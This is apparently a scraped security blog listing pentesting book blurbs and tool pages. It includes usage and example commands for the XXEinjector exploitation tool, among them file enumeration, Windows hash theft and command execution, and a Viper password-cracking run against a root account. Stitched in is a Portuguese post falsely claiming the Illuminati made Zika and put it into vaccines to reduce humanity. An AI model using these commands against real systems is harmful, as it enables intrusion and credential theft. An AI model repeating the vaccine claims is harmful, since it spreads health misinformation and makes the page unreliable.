Penetration Testing

Book Description:

Penetration testers simulate cyber attacks to find security weaknesses in networks, operating systems, and applications. Information security experts worldwide use penetration techniques to evaluate enterprise defenses.

In Penetration Testing, security expert, researcher, and trainer Georgia Weidman introduces you to the core skills and techniques that every pentester needs. Using a virtual machine–based lab that includes Kali Linux and vulnerable operating systems, you’ll run through a series of practical lessons with tools like Wireshark, Nmap, and Burp Suite. As you follow along with the labs and launch attacks, you’ll experience the key stages of an actual assessment-including information gathering, finding exploitable vulnerabilities, gaining access to systems, post exploitation, and more.





Source: allitebooks

By Offensive Sec

Read More

Penetration Testing with BackBox

Book Description:

BackBox is an amazing Linux security distribution designed to keep in mind the needs of security and system administration specialists. It has been developed to perform penetration tests and security assessments. Designed to be fast and easy to use while providing a minimal yet complete desktop environment, Backbox comes with its own software repositories and is continually updated to the latest stable version of the most widely used and best-known ethical hacking tools.

This book provides an exciting introduction to BackBox Linux in order give you familiarity with and understanding of this amazing Linux security distro, making you feel comfortable with both the subject of pen-testing and BackBox. The book progresses through topics based on standard cases of penetration testing from the initial steps to the final procedures.

This book will help you discover the exciting world of penetration testing through a series of step-by-step, practical lessons. Penetration Testing with BackBox is organized into eight chapters. Starting with an introduction to BackBox Linux in order to give you a solid grounding of this amazing Linux security distro, including both its design philosophy and feature set, before moving on to practical tutorials in using BackBox. The book is arranged in a chronological order based on standard cases of penetration testing. For those more experienced in the use of penetration testing tools, each chapter can be read independently, providing a detailed overview of how BackBox will augment your arsenal of tools at each step of the penetration testing process.






Source: allitebooks

By Offensive Sec

Read More

Arma Illuminati para Reduzir a Humanidade - Zika Vírus

Quando eu divulguei pela primeira vez o vídeo afirmando sobre esse assunto, alguns iludidos, defensores e escravos do sistema, acharam que era um absurdo e criticaram essa hipótese.

Porem a cada dia se confirma essa hipótese, e com mais gravidade, porque não é somente no Brasil, na América Latina e África, que estão afetando, mas sim, todo o planeta. Esse vírus esta sendo disseminado através dos mosquito, vacinas, rastros químicos e tudo mais...

Vão criar campanhas para vacinar as pessoas como um modo enganoso de imunizar, e com isso, vão injetar nas vacinas o próprio vírus, eles já fazem esse tipo de contaminação há muito tempo na população, com diversos outros vírus.

O zika vírus foi criado para reduzir a população mundial, afeta diretamente as crianças em seu tempo de gestação, mas também afeta a todos, adoecendo as pessoas onde o principal alvo é o cérebro, mesmo as pessoas achando que foram curadas com os tratamentos, elas não foram, elas continuam infectadas com o vírus, não existe cura, melhor dizendo, existe sim, eles não criam nada sem o antídoto, mas não estará ao alcance da população comum, artigos foram divulgados, com relatos de uma suposta vacina daqui a dez anos, se for assim, qualquer campanha agora seria para mais contaminação, e eles não querem curar as pessoas, e sim, como eu disse antes, reduzir.

O vírus afeta o cérebro das pessoas desenvolvidas, as sequelas seria o retardamento mental, morte dos neurônios e por ai vai, se causa redução encefálica nos bebês, crianças, jovens e adultos seria quase com certeza exatamente isso.

Preparei esse segundo vídeo para reforçar o primeiro, nada disso é teórico, tudo já esta se confirmando, os illuminati estão alcançando seus objetivos, e os céticos estão os ajudando com desinformações, esses vão morrer defendendo o sistema, seja porque trabalham em laboratórios, e acham sabem das coisas, não importa, esses sempre colocaram suas profissão acima da saúde dos outros e até mesmo das suas próprias.

Os illuminati tem metas, e eles estão jogando tudo contra a população mundial para alcança seus objetivos, que é reduzir drasticamente a humanidade. Se você continua não acreditando nesse fato, não importa, a agenda deles permaneceu durante muito tempo sem o seu conhecimento, e é justamente por isso, que eles estão onde estão, e todos nós também...

Assista ao vídeo 

Source: Oculto Revelado

By Offensive Sec

Read More

Penetration Testing with the Bash shell

Book Description:

This book teaches you to take your problem solving capabilities to the next level with the Bash shell, to assess network and application level security by leveraging the power of the command-line tools available with Kali Linux.

The book begins by introducing some of the fundamental bash scripting and information processing tools. Building on this, the next few chapters focus on detailing ways to customize your Bash shell using functionalities such as tab completion and rich text formatting. After the fundamental customization techniques and general purpose tools have been discussed, the book breaks into topics such as the command-line-based security tools in the Kali Linux operating system. The general approach in discussing these tools is to involve general purpose tools discussed in previous chapters to integrate security assessment tools. This is a one stop solution to learn Bash and solve information security problems.





Source: allitebooks

By Offensive Sec

Read More

Tool For Automatic Exploitation Of XXE Vulnerability - XXEinjector

Einjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.


Options 

--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
--file Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
--path Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
--brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)
--logger Log results only. Do not send requests. HTTP logger looks for "p" parameter with results.

--rhost Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)
--rport Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)

--oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)
--direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)
--2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
--phpfilter Use PHP filter to base64 encode target file before sending.
--netdoc Use netdoc protocol instead of file (Java).
--enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)

--hashes Steals Windows hash of the user that runs an application.
--expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)
--upload Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)
--xslt Tests for XSLT injection.

--ssl Use SSL.
--proxy Proxy to use. (--proxy=127.0.0.1:8080)
--httpport Set custom HTTP port. (--httpport=80)
--ftpport Set custom FTP port. (--ftpport=21)
--gopherport Set custom gopher port. (--gopherport=70)
--jarport Set custom port for uploading files using jar. (--jarport=1337)
--xsltport Set custom port for XSLT injection test. (--xsltport=1337)

--test This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server.
--urlencode URL encode injected DTD. This is default for URI.
--nodtd If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like.
--output Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)
--timeout Timeout for receiving file/directory content. (--timeout=20)
--contimeout Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)
--fast Skip asking what to enumerate. Prone to false-positives.
--verbose Show verbose messages.r closing connection with server. This is used to prevent DoS condition. (--contimeout=20)
--fast Skip asking what to enumerate. Prone to false-positives.
--verbose Show verbose messages.

Example usage

Enumerating /etc directory in HTTPS application: 

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

Enumerating /etc directory using gopher for OOB method: 

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

Second order exploitation: 

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt 

Bruteforcing files using HTTP out of band method and netdoc protocol: 

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc

Enumerating using direct exploitation: 

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

Enumerating unfiltered ports: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

Stealing Windows hashes: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes

Uploading files using Java jar: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf

Executing system commands using PHP expect: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls

Testing for XSLT injection: 

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt

Log requests only: 

ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt 

Download Xxeinjector

Read More

Cracking Unix Passwords Brute Force - Viper

Viper is a prute force UNIX-style password cracker for passwords encrypt with crypt. It has been developed from Hale's viper 1.4 Perl program. While there are other more powerful crack programs out, this one is about studying the safety of passwords while hardware speed is increasing drastically. If I remember right, I read that on a PDP-11 the password generation took 30 seconds. Now we can do more then 230.000 generations per second on a single CPU core of a single system, increasing speed by a factor of several million. Still, there is some time to go for a 8-character password on full keyspace, see keyspace.txt.

Originally, the ufc-crypt implementation seemed to be the fastest crypt function around, using it made porting the program to different platforms easy.

Viper runs under Linux, Solaris, HPUX and DOS/Windows.


Usage 

Viper v1.6 (Hale 05/12/2000) - C version by Frank4DD (05/05/2014)
Wiltered Fire - www.wilter.com/wf, incl. bugfixes by David C. Rankin

        -f     File to load password from (required unless using lsf)
        -u     Username to load from file (required unless using lsf)
        -lsf   Load saved file from previous session
        -pf    Save progress to file at update interval
        -rf #        Amount of time in hours to run for (default infinite)
        -c #         Character set from charset.ini to use (default 1)
        -pws #       Minimum password length (starting value, default 1)
        -pwl #       Maximum password length (default 8 - maximum 16)
        -ui #        Console update interval (in minutes - default 10)

        -v           Verbose output




Usage Example 

susie112:/home/me/viper-1.6/src # ./viper -f passwd -u root -ui 1 -v

Viper v1.6 (Hale 05/12/2000) - C version by Frank4DD (05/05/2014)
Wiltered Fire - www.wilter.com/wf, incl. bugfixes by David C. Rankin

Found: user root pw:reUJbHrFWYCQk
Found: Charset 0 in charset.ini
...command line parameters loaded.
Character set is 93 chars long
Starting crack on: Sun Oct  3 23:04:44 2009
Cracking for pass length 1 (93 possibilities)
Cracking for pass length 2 (8649 possibilities)
Cracking for pass length 3 (804357 possibilities)
Cracking for pass length 4 (7.48052e+07 possibilities)

[ Length: | Last:    | CPS:    | Time Spent:      | Time Remaining:  | Done:  ]
-------------------------------------------------------------------------------
[    4    |     kq2r |  150000 | 000d:00h:01m:00s | 000d:00h:07m:18s | 12.03% ]

 The password has been located.
 Username : root
 Password : test
 Started  : Sun Oct  3 23:04:44 2009
 Finished : Sun Oct  3 23:06:30 2009
 Duration : 000d:00h:01m:00s


Viper exiting...



Latest Updates 

ºViper Version 1.5 has been updated to use the OpenSSL DES routines for encrypting. The UFC library has been dropped as outdated and even generating segfaults on some systems. There is a performance gain of approx. 25% coming from the OpenSSL libraries. In addition to the libraries, the OpenSSL headers (dev package) need to be installed in order to be able to compile Viper. 

ºViper Version 1.6 received bugfixes thanks to David C. Rankin. 


See also http://fm4dd.com/sw/viper/ 

Download Viper

Read More

Perl Brik Platform - Metabrik

Smartphones have their apps, Web browsers have their apps, shells don’t. With Metabrik, we tried to merge the power of shells with the power of the Perl language by creating a platform allowing to quickly write reusable Briks.

Metabrik goals:

ºGlue the Perl language with a shell
ºGive a standardised API to write reusable Briks
ºSelf-documented Briks to make them easy to use
ºOnly 4 main shell commands to remember: use, set, get, run

Metabrik features:

ºCompletion on Brik names, Commands and Attributes
ºCompletion on file manipulation
ºCompletion on Perl variable names
ºCommand history and recalling
ºCustomization support with a .rc file
ºScripting support
ºMultiple Brik repositories support

Metabrik helps you to concentrate on scenarios instead of wasting your time searching how to use a program. You just have to reuse available Briks to perform your everyday job.

The two main ideas behind Metabrik are:

ºYou have the brain, code has the details
ºDo it once

Download Metabrik

Read More

Practical Reverse Engineering

Book Description:

Reverse engineering is the process of analyzing hardware or software and understanding it, without having access to the source code or design documents. Hackers are able to reverse engineer systems and exploit what they find with scary results. Now the good guys can use the same tools to thwart these threats. Practical Reverse Engineering goes under the hood of reverse engineering for security analysts, security engineers, and system programmers, so they can learn how to use these same processes to stop hackers in their tracks.

The book covers x86, x64, and ARM (the first book to cover all three); Windows kernel-mode code rootkits and drivers; virtual machine protection techniques; and much more. Best of all, it offers a systematic approach to the material, with plenty of hands-on exercises and real-world examples.





Source: allitebooks

By Offensive Sec

Read More

The Art of Memory Forensics

Book Description:

Memory forensics is the art of analyzing computer memory (RAM) to solve digital crimes. As a follow-up to the best seller Malware Analyst’s Cookbook, experts in the fields of malware, security, and digital forensics bring you a step-by-step guide to memory forensics – now the most sought after skill in the digital forensics and incident response fields.

Beginning with introductory concepts and moving toward the advanced, The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory is based on a five day training course that the authors have presented to hundreds of students. It is the only book on the market that focuses exclusively on memory forensics and how to deploy such techniques properly.






Source: allitebooks

By Offensive Sec

Read More